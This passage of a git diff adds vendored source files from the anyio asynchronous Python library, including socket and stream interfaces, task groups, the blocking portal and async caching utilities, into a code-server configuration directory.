+ """ + Represents an unconnected UDP socket. + + Supports all relevant extra attributes from :class:`~SocketAttribute`. + """ + + @classmethod + async def from_socket(cls, sock_or_fd: socket.socket | int) -> UDPSocket: + """ + Wrap an existing socket object or file descriptor as a UDP socket. + + The newly created socket wrapper takes ownership of the socket being passed in. + The existing socket must be bound to a local address. + + :param sock_or_fd: a socket object or file descriptor + :return: a UDP socket + + """ + sock = _validate_socket(sock_or_fd, socket.SOCK_DGRAM, require_bound=True) + return await get_async_backend().wrap_udp_socket(sock) + + async def sendto(self, data: bytes, host: str, port: int) -> None: + """ + Alias for :meth:`~.UnreliableObjectSendStream.send` ((data, (host, port))). + + """ + return await self.send((data, (host, port))) + + +class ConnectedUDPSocket(UnreliableObjectStream[bytes], _SocketProvider): + """ + Represents an connected UDP socket. + + Supports all relevant extra attributes from :class:`~SocketAttribute`. + """ + + @classmethod + async def from_socket(cls, sock_or_fd: socket.socket | int) -> ConnectedUDPSocket: + """ + Wrap an existing socket object or file descriptor as a connected UDP socket. + + The newly created socket wrapper takes ownership of the socket being passed in. + The existing socket must already be connected. + + :param sock_or_fd: a socket object or file descriptor + :return: a connected UDP socket + + """ + sock = _validate_socket( + sock_or_fd, + socket.SOCK_DGRAM, + require_connected=True, + ) + return await get_async_backend().wrap_connected_udp_socket(sock) + + +class UNIXDatagramSocket( + UnreliableObjectStream[UNIXDatagramPacketType], _SocketProvider +): + """ + Represents an unconnected Unix datagram socket. + + Supports all relevant extra attributes from :class:`~SocketAttribute`. + """ + + @classmethod + async def from_socket( + cls, + sock_or_fd: socket.socket | int, + ) -> UNIXDatagramSocket: + """ + Wrap an existing socket object or file descriptor as a UNIX datagram + socket. + + The newly created socket wrapper takes ownership of the socket being passed in. + + :param sock_or_fd: a socket object or file descriptor + :return: a UNIX datagram socket + + """ + sock = _validate_socket(sock_or_fd, socket.SOCK_DGRAM, socket.AF_UNIX) + return await get_async_backend().wrap_unix_datagram_socket(sock) + + async def sendto(self, data: bytes, path: str) -> None: + """Alias for :meth:`~.UnreliableObjectSendStream.send` ((data, path)).""" + return await self.send((data, path)) + + +class ConnectedUNIXDatagramSocket(UnreliableObjectStream[bytes], _SocketProvider): + """ + Represents a connected Unix datagram socket. + + Supports all relevant extra attributes from :class:`~SocketAttribute`. + """ + + @classmethod + async def from_socket( + cls, + sock_or_fd: socket.socket | int, + ) -> ConnectedUNIXDatagramSocket: + """ + Wrap an existing socket object or file descriptor as a connected UNIX datagram + socket. + + The newly created socket wrapper takes ownership of the socket being passed in. + The existing socket must already be connected. + + :param sock_or_fd: a socket object or file descriptor + :return: a connected UNIX datagram socket + + """ + sock = _validate_socket( + sock_or_fd, socket.SOCK_DGRAM, socket.AF_UNIX, require_connected=True + ) + return await get_async_backend().wrap_connected_unix_datagram_socket(sock) diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/abc/_streams.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/abc/_streams.py new file mode 100755 index 0000000..369df3f --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/abc/_streams.py @@ -0,0 +1,239 @@ +from __future__ import annotations + +import sys +from abc import ABCMeta, abstractmethod +from collections.abc import Callable +from typing import Any, Generic, TypeVar, Union + +from .._core._exceptions import EndOfStream +from .._core._typedattr import TypedAttributeProvider +from ._resources import AsyncResource +from ._tasks import TaskGroup + +if sys.version_info >= (3, 10): + from typing import TypeAlias +else: + from typing_extensions import TypeAlias + +T_Item = TypeVar("T_Item") +T_co = TypeVar("T_co", covariant=True) +T_contra = TypeVar("T_contra", contravariant=True) + + +class UnreliableObjectReceiveStream( + Generic[T_co], AsyncResource, TypedAttributeProvider +): + """ + An interface for receiving objects. + + This interface makes no guarantees that the received messages arrive in the order in + which they were sent, or that no messages are missed. + + Asynchronously iterating over objects of this type will yield objects matching the + given type parameter. + """ + + def __aiter__(self) -> UnreliableObjectReceiveStream[T_co]: + return self + + async def __anext__(self) -> T_co: + try: + return await self.receive() + except EndOfStream: + raise StopAsyncIteration from None + + @abstractmethod + async def receive(self) -> T_co: + """ + Receive the next item. + + :raises ~anyio.ClosedResourceError: if the receive stream has been explicitly + closed + :raises ~anyio.EndOfStream: if this stream has been closed from the other end + :raises ~anyio.BrokenResourceError: if this stream has been rendered unusable + due to external causes + """ + + +class UnreliableObjectSendStream( + Generic[T_contra], AsyncResource, TypedAttributeProvider +): + """ + An interface for sending objects. + + This interface makes no guarantees that the messages sent will reach the + recipient(s) in the same order in which they were sent, or at all. + """ + + @abstractmethod + async def send(self, item: T_contra) -> None: + """ + Send an item to the peer(s). + + :param item: the item to send + :raises ~anyio.ClosedResourceError: if the send stream has been explicitly + closed + :raises ~anyio.BrokenResourceError: if this stream has been rendered unusable + due to external causes + """ + + +class UnreliableObjectStream( + UnreliableObjectReceiveStream[T_Item], UnreliableObjectSendStream[T_Item] +): + """ + A bidirectional message stream which does not guarantee the order or reliability of + message delivery. + """ + + +class ObjectReceiveStream(UnreliableObjectReceiveStream[T_co]): + """ + A receive message stream which guarantees that messages are received in the same + order in which they were sent, and that no messages are missed. + """ + + +class ObjectSendStream(UnreliableObjectSendStream[T_contra]): + """ + A send message stream which guarantees that messages are delivered in the same order + in which they were sent, without missing any messages in the middle. + """ + + +class ObjectStream( + ObjectReceiveStream[T_Item], + ObjectSendStream[T_Item], + UnreliableObjectStream[T_Item], +): + """ + A bidirectional message stream which guarantees the order and reliability of message + delivery. + """ + + @abstractmethod + async def send_eof(self) -> None: + """ + Send an end-of-file indication to the peer. + + You should not try to send any further data to this stream after calling this + method. This method is idempotent (does nothing on successive calls). + """ + + +class ByteReceiveStream(AsyncResource, TypedAttributeProvider): + """ + An interface for receiving bytes from a single peer. + + Iterating this byte stream will yield a byte string of arbitrary length, but no more + than 65536 bytes. + """ + + def __aiter__(self) -> ByteReceiveStream: + return self + + async def __anext__(self) -> bytes: + try: + return await self.receive() + except EndOfStream: + raise StopAsyncIteration from None + + @abstractmethod + async def receive(self, max_bytes: int = 65536) -> bytes: + """ + Receive at most ``max_bytes`` bytes from the peer. + + .. note:: Implementers of this interface should not return an empty + :class:`bytes` object, and users should ignore them. + + :param max_bytes: maximum number of bytes to receive + :return: the received bytes + :raises ~anyio.EndOfStream: if this stream has been closed from the other end + """ + + +class ByteSendStream(AsyncResource, TypedAttributeProvider): + """An interface for sending bytes to a single peer.""" + + @abstractmethod + async def send(self, item: bytes) -> None: + """ + Send the given bytes to the peer. + + :param item: the bytes to send + """ + + +class ByteStream(ByteReceiveStream, ByteSendStream): + """A bidirectional byte stream.""" + + @abstractmethod + async def send_eof(self) -> None: + """ + Send an end-of-file indication to the peer. + + You should not try to send any further data to this stream after calling this + method. This method is idempotent (does nothing on successive calls). + """ + + +#: Type alias for all unreliable bytes-oriented receive streams. +AnyUnreliableByteReceiveStream: TypeAlias = Union[ + UnreliableObjectReceiveStream[bytes], ByteReceiveStream +] +#: Type alias for all unreliable bytes-oriented send streams. +AnyUnreliableByteSendStream: TypeAlias = Union[ + UnreliableObjectSendStream[bytes], ByteSendStream +] +#: Type alias for all unreliable bytes-oriented streams. +AnyUnreliableByteStream: TypeAlias = Union[UnreliableObjectStream[bytes], ByteStream] +#: Type alias for all bytes-oriented receive streams. +AnyByteReceiveStream: TypeAlias = Union[ObjectReceiveStream[bytes], ByteReceiveStream] +#: Type alias for all bytes-oriented send streams. +AnyByteSendStream: TypeAlias = Union[ObjectSendStream[bytes], ByteSendStream] +#: Type alias for all bytes-oriented streams. +AnyByteStream: TypeAlias = Union[ObjectStream[bytes], ByteStream] + + +class Listener(Generic[T_co], AsyncResource, TypedAttributeProvider): + """An interface for objects that let you accept incoming connections.""" + + @abstractmethod + async def serve( + self, handler: Callable[[T_co], Any], task_group: TaskGroup | None = None + ) -> None: + """ + Accept incoming connections as they come in and start tasks to handle them. + + :param handler: a callable that will be used to handle each accepted connection + :param task_group: the task group that will be used to start tasks for handling + each accepted connection (if omitted, an ad-hoc task group will be created) + """ + + +class ObjectStreamConnectable(Generic[T_co], metaclass=ABCMeta): + @abstractmethod + async def connect(self) -> ObjectStream[T_co]: + """ + Connect to the remote endpoint. + + :return: an object stream connected to the remote end + :raises ConnectionFailed: if the connection fails + """ + + +class ByteStreamConnectable(metaclass=ABCMeta): + @abstractmethod + async def connect(self) -> ByteStream: + """ + Connect to the remote endpoint. + + :return: a bytestream connected to the remote end + :raises ConnectionFailed: if the connection fails + """ + + +#: Type alias for all connectables returning bytestreams or bytes-oriented object streams +AnyByteStreamConnectable: TypeAlias = Union[ + ObjectStreamConnectable[bytes], ByteStreamConnectable +] diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/abc/_subprocesses.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/abc/_subprocesses.py new file mode 100755 index 0000000..ce0564c --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/abc/_subprocesses.py @@ -0,0 +1,79 @@ +from __future__ import annotations + +from abc import abstractmethod +from signal import Signals + +from ._resources import AsyncResource +from ._streams import ByteReceiveStream, ByteSendStream + + +class Process(AsyncResource): + """An asynchronous version of :class:`subprocess.Popen`.""" + + @abstractmethod + async def wait(self) -> int: + """ + Wait until the process exits. + + :return: the exit code of the process + """ + + @abstractmethod + def terminate(self) -> None: + """ + Terminates the process, gracefully if possible. + + On Windows, this calls ``TerminateProcess()``. + On POSIX systems, this sends ``SIGTERM`` to the process. + + .. seealso:: :meth:`subprocess.Popen.terminate` + """ + + @abstractmethod + def kill(self) -> None: + """ + Kills the process. + + On Windows, this calls ``TerminateProcess()``. + On POSIX systems, this sends ``SIGKILL`` to the process. + + .. seealso:: :meth:`subprocess.Popen.kill` + """ + + @abstractmethod + def send_signal(self, signal: Signals) -> None: + """ + Send a signal to the subprocess. + + .. seealso:: :meth:`subprocess.Popen.send_signal` + + :param signal: the signal number (e.g. :data:`signal.SIGHUP`) + """ + + @property + @abstractmethod + def pid(self) -> int: + """The process ID of the process.""" + + @property + @abstractmethod + def returncode(self) -> int | None: + """ + The return code of the process. If the process has not yet terminated, this will + be ``None``. + """ + + @property + @abstractmethod + def stdin(self) -> ByteSendStream | None: + """The stream for the standard input of the process.""" + + @property + @abstractmethod + def stdout(self) -> ByteReceiveStream | None: + """The stream for the standard output of the process.""" + + @property + @abstractmethod + def stderr(self) -> ByteReceiveStream | None: + """The stream for the standard error output of the process.""" diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/abc/_tasks.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/abc/_tasks.py new file mode 100755 index 0000000..516b3ec --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/abc/_tasks.py @@ -0,0 +1,117 @@ +from __future__ import annotations + +import sys +from abc import ABCMeta, abstractmethod +from collections.abc import Awaitable, Callable +from types import TracebackType +from typing import TYPE_CHECKING, Any, Protocol, overload + +if sys.version_info >= (3, 13): + from typing import TypeVar +else: + from typing_extensions import TypeVar + +if sys.version_info >= (3, 11): + from typing import TypeVarTuple, Unpack +else: + from typing_extensions import TypeVarTuple, Unpack + +if TYPE_CHECKING: + from .._core._tasks import CancelScope + +T_Retval = TypeVar("T_Retval") +T_contra = TypeVar("T_contra", contravariant=True, default=None) +PosArgsT = TypeVarTuple("PosArgsT") + + +class TaskStatus(Protocol[T_contra]): + @overload + def started(self: TaskStatus[None]) -> None: ... + + @overload + def started(self, value: T_contra) -> None: ... + + def started(self, value: T_contra | None = None) -> None: + """ + Signal that the task has started. + + :param value: object passed back to the starter of the task + """ + + +class TaskGroup(metaclass=ABCMeta): + """ + Groups several asynchronous tasks together. + + :ivar cancel_scope: the cancel scope inherited by all child tasks + :vartype cancel_scope: CancelScope + + .. note:: On asyncio, support for eager task factories is considered to be + **experimental**. In particular, they don't follow the usual semantics of new + tasks being scheduled on the next iteration of the event loop, and may thus + cause unexpected behavior in code that wasn't written with such semantics in + mind. + """ + + cancel_scope: CancelScope + + @abstractmethod + def start_soon( + self, + func: Callable[[Unpack[PosArgsT]], Awaitable[Any]], + *args: Unpack[PosArgsT], + name: object = None, + ) -> None: + """ + Start a new task in this task group. + + :param func: a coroutine function + :param args: positional arguments to call the function with + :param name: name of the task, for the purposes of introspection and debugging + + .. versionadded:: 3.0 + """ + + @abstractmethod + async def start( + self, + func: Callable[..., Awaitable[Any]], + *args: object, + name: object = None, + ) -> Any: + """ + Start a new task and wait until it signals for readiness. + + The target callable must accept a keyword argument ``task_status`` (of type + :class:`TaskStatus`). Awaiting on this method will return whatever was passed to + ``task_status.started()`` (``None`` by default). + + .. note:: The :class:`TaskStatus` class is generic, and the type argument should + indicate the type of the value that will be passed to + ``task_status.started()``. + + :param func: a coroutine function that accepts the ``task_status`` keyword + argument + :param args: positional arguments to call the function with + :param name: an optional name for the task, for introspection and debugging + :return: the value passed to ``task_status.started()`` + :raises RuntimeError: if the task finishes without calling + ``task_status.started()`` + + .. seealso:: :ref:`start_initialize` + + .. versionadded:: 3.0 + """ + + @abstractmethod + async def __aenter__(self) -> TaskGroup: + """Enter the task group context and allow starting new tasks.""" + + @abstractmethod + async def __aexit__( + self, + exc_type: type[BaseException] | None, + exc_val: BaseException | None, + exc_tb: TracebackType | None, + ) -> bool: + """Exit the task group context waiting for all tasks to finish.""" diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/abc/_testing.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/abc/_testing.py new file mode 100755 index 0000000..7c50ed7 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/abc/_testing.py @@ -0,0 +1,65 @@ +from __future__ import annotations + +import types +from abc import ABCMeta, abstractmethod +from collections.abc import AsyncGenerator, Callable, Coroutine, Iterable +from typing import Any, TypeVar + +_T = TypeVar("_T") + + +class TestRunner(metaclass=ABCMeta): + """ + Encapsulates a running event loop. Every call made through this object will use the + same event loop. + """ + + def __enter__(self) -> TestRunner: + return self + + @abstractmethod + def __exit__( + self, + exc_type: type[BaseException] | None, + exc_val: BaseException | None, + exc_tb: types.TracebackType | None, + ) -> bool | None: ... + + @abstractmethod + def run_asyncgen_fixture( + self, + fixture_func: Callable[..., AsyncGenerator[_T, Any]], + kwargs: dict[str, Any], + ) -> Iterable[_T]: + """ + Run an async generator fixture. + + :param fixture_func: the fixture function + :param kwargs: keyword arguments to call the fixture function with + :return: an iterator yielding the value yielded from the async generator + """ + + @abstractmethod + def run_fixture( + self, + fixture_func: Callable[..., Coroutine[Any, Any, _T]], + kwargs: dict[str, Any], + ) -> _T: + """ + Run an async fixture. + + :param fixture_func: the fixture function + :param kwargs: keyword arguments to call the fixture function with + :return: the return value of the fixture function + """ + + @abstractmethod + def run_test( + self, test_func: Callable[..., Coroutine[Any, Any, Any]], kwargs: dict[str, Any] + ) -> None: + """ + Run an async test function. + + :param test_func: the test function + :param kwargs: keyword arguments to call the test function with + """ diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/from_thread.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/from_thread.py new file mode 100755 index 0000000..837de5e --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/from_thread.py @@ -0,0 +1,578 @@ +from __future__ import annotations + +__all__ = ( + "BlockingPortal", + "BlockingPortalProvider", + "check_cancelled", + "run", + "run_sync", + "start_blocking_portal", +) + +import sys +from collections.abc import Awaitable, Callable, Generator +from concurrent.futures import Future +from contextlib import ( + AbstractAsyncContextManager, + AbstractContextManager, + contextmanager, +) +from dataclasses import dataclass, field +from functools import partial +from inspect import isawaitable +from threading import Lock, Thread, current_thread, get_ident +from types import TracebackType +from typing import ( + Any, + Generic, + TypeVar, + cast, + overload, +) + +from ._core._eventloop import ( + get_cancelled_exc_class, + threadlocals, +) +from ._core._eventloop import run as run_eventloop +from ._core._exceptions import NoEventLoopError +from ._core._synchronization import Event +from ._core._tasks import CancelScope, create_task_group +from .abc._tasks import TaskStatus +from .lowlevel import EventLoopToken, current_token + +if sys.version_info >= (3, 11): + from typing import TypeVarTuple, Unpack +else: + from typing_extensions import TypeVarTuple, Unpack + +T_Retval = TypeVar("T_Retval") +T_co = TypeVar("T_co", covariant=True) +PosArgsT = TypeVarTuple("PosArgsT") + + +def _token_or_error(token: EventLoopToken | None) -> EventLoopToken: + if token is not None: + return token + + try: + return threadlocals.current_token + except AttributeError: + raise NoEventLoopError( + "Not running inside an AnyIO worker thread, and no event loop token was " + "provided" + ) from None + + +def run( + func: Callable[[Unpack[PosArgsT]], Awaitable[T_Retval]], + *args: Unpack[PosArgsT], + token: EventLoopToken | None = None, +) -> T_Retval: + """ + Call a coroutine function from a worker thread. + + :param func: a coroutine function + :param args: positional arguments for the callable + :param token: an event loop token to use to get back to the event loop thread + (required if calling this function from outside an AnyIO worker thread) + :return: the return value of the coroutine function + :raises MissingTokenError: if no token was provided and called from outside an + AnyIO worker thread + :raises RunFinishedError: if the event loop tied to ``token`` is no longer running + + .. versionchanged:: 4.11.0 + Added the ``token`` parameter. + + """ + explicit_token = token is not None + token = _token_or_error(token) + return token.backend_class.run_async_from_thread( + func, args, token=token.native_token if explicit_token else None + ) + + +def run_sync( + func: Callable[[Unpack[PosArgsT]], T_Retval], + *args: Unpack[PosArgsT], + token: EventLoopToken | None = None, +) -> T_Retval: + """ + Call a function in the event loop thread from a worker thread. + + :param func: a callable + :param args: positional arguments for the callable + :param token: an event loop token to use to get back to the event loop thread + (required if calling this function from outside an AnyIO worker thread) + :return: the return value of the callable + :raises MissingTokenError: if no token was provided and called from outside an + AnyIO worker thread + :raises RunFinishedError: if the event loop tied to ``token`` is no longer running + + .. versionchanged:: 4.11.0 + Added the ``token`` parameter. + + """ + explicit_token = token is not None + token = _token_or_error(token) + return token.backend_class.run_sync_from_thread( + func, args, token=token.native_token if explicit_token else None + ) + + +class _BlockingAsyncContextManager(Generic[T_co], AbstractContextManager): + _enter_future: Future[T_co] + _exit_future: Future[bool | None] + _exit_event: Event + _exit_exc_info: tuple[ + type[BaseException] | None, BaseException | None, TracebackType | None + ] = (None, None, None) + + def __init__( + self, async_cm: AbstractAsyncContextManager[T_co], portal: BlockingPortal + ): + self._async_cm = async_cm + self._portal = portal + + async def run_async_cm(self) -> bool | None: + try: + self._exit_event = Event() + value = await self._async_cm.__aenter__() + except BaseException as exc: + self._enter_future.set_exception(exc) + raise + else: + self._enter_future.set_result(value) + + try: + # Wait for the sync context manager to exit. + # This next statement can raise `get_cancelled_exc_class()` if + # something went wrong in a task group in this async context + # manager. + await self._exit_event.wait() + finally: + # In case of cancellation, it could be that we end up here before + # `_BlockingAsyncContextManager.__exit__` is called, and an + # `_exit_exc_info` has been set. + result = await self._async_cm.__aexit__(*self._exit_exc_info) + + return result + + def __enter__(self) -> T_co: + self._enter_future = Future() + self._exit_future = self._portal.start_task_soon(self.run_async_cm) + return self._enter_future.result() + + def __exit__( + self, + __exc_type: type[BaseException] | None, + __exc_value: BaseException | None, + __traceback: TracebackType | None, + ) -> bool | None: + self._exit_exc_info = __exc_type, __exc_value, __traceback + self._portal.call(self._exit_event.set) + return self._exit_future.result() + + +class _BlockingPortalTaskStatus(TaskStatus): + def __init__(self, future: Future): + self._future = future + + def started(self, value: object = None) -> None: + self._future.set_result(value) + + +class BlockingPortal: + """ + An object that lets external threads run code in an asynchronous event loop. + + :raises NoEventLoopError: if no supported asynchronous event loop is running in the + current thread + """ + + def __init__(self) -> None: + self._token = current_token() + self._event_loop_thread_id: int | None = get_ident() + self._stop_event = Event() + self._task_group = create_task_group() + + async def __aenter__(self) -> BlockingPortal: + await self._task_group.__aenter__() + return self + + async def __aexit__( + self, + exc_type: type[BaseException] | None, + exc_val: BaseException | None, + exc_tb: TracebackType | None, + ) -> bool: + await self.stop() + return await self._task_group.__aexit__(exc_type, exc_val, exc_tb) + + def _check_running(self) -> None: + if self._event_loop_thread_id is None: + raise RuntimeError("This portal is not running") + if self._event_loop_thread_id == get_ident(): + raise RuntimeError( + "This method cannot be called from the event loop thread" + ) + + async def sleep_until_stopped(self) -> None: + """Sleep until :meth:`stop` is called.""" + await self._stop_event.wait() + + async def stop(self, cancel_remaining: bool = False) -> None: + """ + Signal the portal to shut down. + + This marks the portal as no longer accepting new calls and exits from + :meth:`sleep_until_stopped`. + + :param cancel_remaining: ``True`` to cancel all the remaining tasks, ``False`` + to let them finish before returning + + """ + self._event_loop_thread_id = None + self._stop_event.set() + if cancel_remaining: + self._task_group.cancel_scope.cancel("the blocking portal is shutting down") + + async def _call_func( + self, + func: Callable[[Unpack[PosArgsT]], Awaitable[T_Retval] | T_Retval], + args: tuple[Unpack[PosArgsT]], + kwargs: dict[str, Any], + future: Future[T_Retval], + ) -> None: + def callback(f: Future[T_Retval]) -> None: + if f.cancelled(): + if self._event_loop_thread_id == get_ident(): + scope.cancel("the future was cancelled") + elif self._event_loop_thread_id is not None: + self.call(scope.cancel, "the future was cancelled") + + try: + retval_or_awaitable = func(*args, **kwargs) + if isawaitable(retval_or_awaitable): + with CancelScope() as scope: + future.add_done_callback(callback) + retval = await retval_or_awaitable + else: + retval = retval_or_awaitable + except get_cancelled_exc_class(): + future.cancel() + future.set_running_or_notify_cancel() + except BaseException as exc: + if not future.cancelled(): + future.set_exception(exc) + + # Let base exceptions fall through + if not isinstance(exc, Exception): + raise + else: + if not future.cancelled(): + future.set_result(retval) + finally: + scope = None # type: ignore[assignment] + + def _spawn_task_from_thread( + self, + func: Callable[[Unpack[PosArgsT]], Awaitable[T_Retval] | T_Retval], + args: tuple[Unpack[PosArgsT]], + kwargs: dict[str, Any], + name: object, + future: Future[T_Retval], + ) -> None: + """ + Spawn a new task using the given callable. + + :param func: a callable + :param args: positional arguments to be passed to the callable + :param kwargs: keyword arguments to be passed to the callable + :param name: name of the task (will be coerced to a string if not ``None``) + :param future: a future that will resolve to the return value of the callable, + or the exception raised during its execution + + """ + run_sync( + partial(self._task_group.start_soon, name=name), + self._call_func, + func, + args, + kwargs, + future, + token=self._token, + ) + + @overload + def call( + self, + func: Callable[[Unpack[PosArgsT]], Awaitable[T_Retval]], + *args: Unpack[PosArgsT], + ) -> T_Retval: ... + + @overload + def call( + self, func: Callable[[Unpack[PosArgsT]], T_Retval], *args: Unpack[PosArgsT] + ) -> T_Retval: ... + + def call( + self, + func: Callable[[Unpack[PosArgsT]], Awaitable[T_Retval] | T_Retval], + *args: Unpack[PosArgsT], + ) -> T_Retval: + """ + Call the given function in the event loop thread. + + If the callable returns a coroutine object, it is awaited on. + + :param func: any callable + :raises RuntimeError: if the portal is not running or if this method is called + from within the event loop thread + + """ + return cast(T_Retval, self.start_task_soon(func, *args).result()) + + @overload + def start_task_soon( + self, + func: Callable[[Unpack[PosArgsT]], Awaitable[T_Retval]], + *args: Unpack[PosArgsT], + name: object = None, + ) -> Future[T_Retval]: ... + + @overload + def start_task_soon( + self, + func: Callable[[Unpack[PosArgsT]], T_Retval], + *args: Unpack[PosArgsT], + name: object = None, + ) -> Future[T_Retval]: ... + + def start_task_soon( + self, + func: Callable[[Unpack[PosArgsT]], Awaitable[T_Retval] | T_Retval], + *args: Unpack[PosArgsT], + name: object = None, + ) -> Future[T_Retval]: + """ + Start a task in the portal's task group. + + The task will be run inside a cancel scope which can be cancelled by cancelling + the returned future. + + :param func: the target function + :param args: positional arguments passed to ``func`` + :param name: name of the task (will be coerced to a string if not ``None``) + :return: a future that resolves with the return value of the callable if the + task completes successfully, or with the exception raised in the task + :raises RuntimeError: if the portal is not running or if this method is called + from within the event loop thread + :rtype: concurrent.futures.Future[T_Retval] + + .. versionadded:: 3.0 + + """ + self._check_running() + f: Future[T_Retval] = Future() + self._spawn_task_from_thread(func, args, {}, name, f) + return f + + def start_task( + self, + func: Callable[..., Awaitable[T_Retval]], + *args: object, + name: object = None, + ) -> tuple[Future[T_Retval], Any]: + """ + Start a task in the portal's task group and wait until it signals for readiness. + + This method works the same way as :meth:`.abc.TaskGroup.start`. + + :param func: the target function + :param args: positional arguments passed to ``func`` + :param name: name of the task (will be coerced to a string if not ``None``) + :return: a tuple of (future, task_status_value) where the ``task_status_value`` + is the value passed to ``task_status.started()`` from within the target + function + :rtype: tuple[concurrent.futures.Future[T_Retval], Any] + + .. versionadded:: 3.0 + + """ + + def task_done(future: Future[T_Retval]) -> None: + if not task_status_future.done(): + if future.cancelled(): + task_status_future.cancel() + elif future.exception(): + task_status_future.set_exception(future.exception()) + else: + exc = RuntimeError( + "Task exited without calling task_status.started()" + ) + task_status_future.set_exception(exc) + + self._check_running() + task_status_future: Future = Future() + task_status = _BlockingPortalTaskStatus(task_status_future) + f: Future = Future() + f.add_done_callback(task_done) + self._spawn_task_from_thread(func, args, {"task_status": task_status}, name, f) + return f, task_status_future.result() + + def wrap_async_context_manager( + self, cm: AbstractAsyncContextManager[T_co] + ) -> AbstractContextManager[T_co]: + """ + Wrap an async context manager as a synchronous context manager via this portal. + + Spawns a task that will call both ``__aenter__()`` and ``__aexit__()``, stopping + in the middle until the synchronous context manager exits. + + :param cm: an asynchronous context manager + :return: a synchronous context manager + + .. versionadded:: 2.1 + + """ + return _BlockingAsyncContextManager(cm, self) + + +@dataclass +class BlockingPortalProvider: + """ + A manager for a blocking portal. Used as a context manager. The first thread to + enter this context manager causes a blocking portal to be started with the specific + parameters, and the last thread to exit causes the portal to be shut down. Thus, + there will be exactly one blocking portal running in this context as long as at + least one thread has entered this context manager. + + The parameters are the same as for :func:`~anyio.run`. + + :param backend: name of the backend + :param backend_options: backend options + + .. versionadded:: 4.4 + """ + + backend: str = "asyncio" + backend_options: dict[str, Any] | None = None + _lock: Lock = field(init=False, default_factory=Lock) + _leases: int = field(init=False, default=0) + _portal: BlockingPortal = field(init=False) + _portal_cm: AbstractContextManager[BlockingPortal] | None = field( + init=False, default=None + ) + + def __enter__(self) -> BlockingPortal: + with self._lock: + if self._portal_cm is None: + self._portal_cm = start_blocking_portal( + self.backend, self.backend_options + ) + self._portal = self._portal_cm.__enter__() + + self._leases += 1 + return self._portal + + def __exit__( + self, + exc_type: type[BaseException] | None, + exc_val: BaseException | None, + exc_tb: TracebackType | None, + ) -> None: + portal_cm: AbstractContextManager[BlockingPortal] | None = None + with self._lock: + assert self._portal_cm + assert self._leases > 0 + self._leases -= 1 + if not self._leases: + portal_cm = self._portal_cm + self._portal_cm = None + del self._portal + + if portal_cm: + portal_cm.__exit__(None, None, None) + + +@contextmanager +def start_blocking_portal( + backend: str = "asyncio", + backend_options: dict[str, Any] | None = None, + *, + name: str | None = None, +) -> Generator[BlockingPortal, Any, None]: + """ + Start a new event loop in a new thread and run a blocking portal in its main task. + + The parameters are the same as for :func:`~anyio.run`. + + :param backend: name of the backend + :param backend_options: backend options + :param name: name of the thread + :return: a context manager that yields a blocking portal + + .. versionchanged:: 3.0 + Usage as a context manager is now required. + + """ + + async def run_portal() -> None: + async with BlockingPortal() as portal_: + if name is None: + current_thread().name = f"{backend}-portal-{id(portal_):x}" + + future.set_result(portal_) + await portal_.sleep_until_stopped() + + def run_blocking_portal() -> None: + if future.set_running_or_notify_cancel(): + try: + run_eventloop( + run_portal, backend=backend, backend_options=backend_options + ) + except BaseException as exc: + if not future.done(): + future.set_exception(exc) + + future: Future[BlockingPortal] = Future() + thread = Thread(target=run_blocking_portal, daemon=True, name=name) + thread.start() + try: + cancel_remaining_tasks = False + portal = future.result() + try: + yield portal + except BaseException: + cancel_remaining_tasks = True + raise + finally: + try: + portal.call(portal.stop, cancel_remaining_tasks) + except RuntimeError: + pass + finally: + thread.join() + + +def check_cancelled() -> None: + """ + Check if the cancel scope of the host task's running the current worker thread has + been cancelled. + + If the host task's current cancel scope has indeed been cancelled, the + backend-specific cancellation exception will be raised. + + :raises RuntimeError: if the current thread was not spawned by + :func:`.to_thread.run_sync` + + """ + try: + token: EventLoopToken = threadlocals.current_token + except AttributeError: + raise NoEventLoopError( + "This function can only be called inside an AnyIO worker thread" + ) from None + + token.backend_class.check_cancelled() diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/functools.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/functools.py new file mode 100755 index 0000000..b80afe6 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/functools.py @@ -0,0 +1,375 @@ +from __future__ import annotations + +__all__ = ( + "AsyncCacheInfo", + "AsyncCacheParameters", + "AsyncLRUCacheWrapper", + "cache", + "lru_cache", + "reduce", +) + +import functools +import sys +from collections import OrderedDict +from collections.abc import ( + AsyncIterable, + Awaitable, + Callable, + Coroutine, + Hashable, + Iterable, +) +from functools import update_wrapper +from inspect import iscoroutinefunction +from typing import ( + Any, + Generic, + NamedTuple, + TypedDict, + TypeVar, + cast, + final, + overload, +) +from weakref import WeakKeyDictionary + +from ._core._synchronization import Lock +from .lowlevel import RunVar, checkpoint + +if sys.version_info >= (3, 11): + from typing import ParamSpec +else: + from typing_extensions import ParamSpec + +T = TypeVar("T") +S = TypeVar("S") +P = ParamSpec("P") +lru_cache_items: RunVar[ + WeakKeyDictionary[ + AsyncLRUCacheWrapper[Any, Any], + OrderedDict[Hashable, tuple[_InitialMissingType, Lock] | tuple[Any, None]], + ] +] = RunVar("lru_cache_items") + + +class _InitialMissingType: + pass + + +initial_missing: _InitialMissingType = _InitialMissingType() + + +class AsyncCacheInfo(NamedTuple): + hits: int + misses: int + maxsize: int | None + currsize: int + + +class AsyncCacheParameters(TypedDict): + maxsize: int | None + typed: bool + always_checkpoint: bool + + +class _LRUMethodWrapper(Generic[T]): + def __init__(self, wrapper: AsyncLRUCacheWrapper[..., T], instance: object): + self.__wrapper = wrapper + self.__instance = instance + + def cache_info(self) -> AsyncCacheInfo: + return self.__wrapper.cache_info() + + def cache_parameters(self) -> AsyncCacheParameters: + return self.__wrapper.cache_parameters() + + def 